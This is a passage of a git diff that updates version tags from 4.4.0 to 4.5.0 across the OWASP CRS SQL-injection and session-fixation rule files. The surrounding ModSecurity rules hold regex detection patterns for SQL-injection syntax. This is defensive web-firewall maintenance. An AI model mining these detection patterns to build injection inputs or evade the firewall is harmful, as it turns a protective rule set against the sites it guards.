 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -325,7 +325,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -345,7 +345,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 multiMatch,\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
@@ -366,7 +366,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -385,7 +385,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -404,12 +404,12 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
 SecRule ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)!=|&&|\|\||>[=>]|<(?:<|=>?|>(?:[\s\x0b]+binary)?)|\b(?:(?:xor|r(?:egexp|like)|i(?:snull|like)|notnull)\b|collate(?:[^0-9A-Z_a-z]*?(?:U&)?[\"'`]|[^0-9A-Z_a-z]+(?:(?:binary|nocase|rtrim)\b|[0-9A-Z_a-z]*?_))|(?:likel(?:ihood|y)|unlikely)[\s\x0b]*\()|r(?:egexp|like)[\s\x0b]+binary|not[\s\x0b]+between[\s\x0b]+(?:0[\s\x0b]+and|(?:'[^']*'|\"[^\"]*\")[\s\x0b]+and[\s\x0b]+(?:'[^']*'|\"[^\"]*\"))|is[\s\x0b]+null|like[\s\x0b]+(?:null|[0-9A-Z_a-z]+[\s\x0b]+escape\b)|(?:^|[^0-9A-Z_a-z])in[\s\x0b\+]*\([\s\x0b\"0-9]+[^\(\)]*\)|[!<->]{1,2}[\s\x0b]*all\b" \
 "id:942120,\
 phase:2,\
@@ -426,7 +426,7 @@ SecRule ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)!=|&&|\|\||>[=>]|<(?:<|
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -446,7 +446,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\x0b\"'-\)`]*?\b([0-9A-Z_a-z]+)\b[\s\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.942130_matched_var_name=%{matched_var_name}',\
 chain"
@@ -470,7 +470,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\x0b\"'-\)`]*?\b([0-9A-Z_a-z]+)\b[\s\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 multiMatch,\
 setvar:'tx.942131_matched_var_name=%{matched_var_name}',\
@@ -495,7 +495,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -515,7 +515,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -535,7 +535,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -555,7 +555,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -575,7 +575,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -595,7 +595,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -615,7 +615,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -635,7 +635,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -655,7 +655,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -675,7 +675,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -695,7 +695,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -715,7 +715,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -735,7 +735,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -755,7 +755,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -775,7 +775,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -795,7 +795,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -815,7 +815,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" 
@@ -835,7 +835,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -855,7 +855,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -867,7 +867,7 @@ SecRule ARGS_GET:fbclid "@rx [a-zA-Z0-9_-]{61,61}" \ nolog,\ tag:'OWASP_CRS',\ ctl:ruleRemoveTargetById=942440;ARGS:fbclid,\ - ver:'OWASP_CRS/4.4.0'" + ver:'OWASP_CRS/4.5.0'" SecRule ARGS_GET:gclid "@rx [a-zA-Z0-9_-]{91,91}" \ "id:942442,\ phase:2,\ @@ -876,7 +876,7 @@ SecRule ARGS_GET:gclid "@rx [a-zA-Z0-9_-]{91,91}" \ nolog,\ tag:'OWASP_CRS',\ ctl:ruleRemoveTargetById=942440;ARGS:gclid,\ - ver:'OWASP_CRS/4.4.0'" + ver:'OWASP_CRS/4.5.0'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx /\*!?|\*/|[';]--|--(?:[\s\x0b]|[^\-]*?-)|[^&\-]#.*?[\s\x0b]|;?\x00" \ "id:942440,\ phase:2,\ @@ -893,7 +893,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS "!@rx ^ey[\-0-9A-Z_a-z]+\.ey[\-0-9A-Z_a-z]+\.[\-0-9A-Z_a-z]+$" \ 
@@ -916,7 +916,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -936,7 +936,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -956,7 +956,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -976,7 +976,7 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.942521_matched_var_name=%{matched_var_name}',\ chain" @@ -1000,7 +1000,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ^.*?\x5c['\"`](?:.*?['\"`])?\s*(?:and|or)\b" tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" 
@@ -1020,7 +1020,7 @@ SecRule REQUEST_BASENAME|REQUEST_FILENAME "@detectSQLi" \ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1040,7 +1040,7 @@ SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)\b(?:a(?:dd( tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1060,12 +1060,12 @@ SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)create[\s\x0 tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\W+\d*?\s*?\bhaving\b\s*?[^\s\-]" \ "id:942251,\ phase:2,\ 
@@ -1082,7 +1082,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1102,7 +1102,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1122,7 +1122,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1142,7 +1142,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1162,7 +1162,7 @@ SecRule ARGS "@rx \W{4}" \ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}'" 
@@ -1182,7 +1182,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1202,12 +1202,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>][^~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>]*?){3})" \ "id:942421,\ phase:1,\ 
@@ -1224,7 +1224,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1244,7 +1244,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" diff --git a/rules/@owasp_crs/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf b/rules/@owasp_crs/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf index 60531c5..13ad9fe 100644 --- a/rules/@owasp_crs/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf +++ b/rules/@owasp_crs/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # 
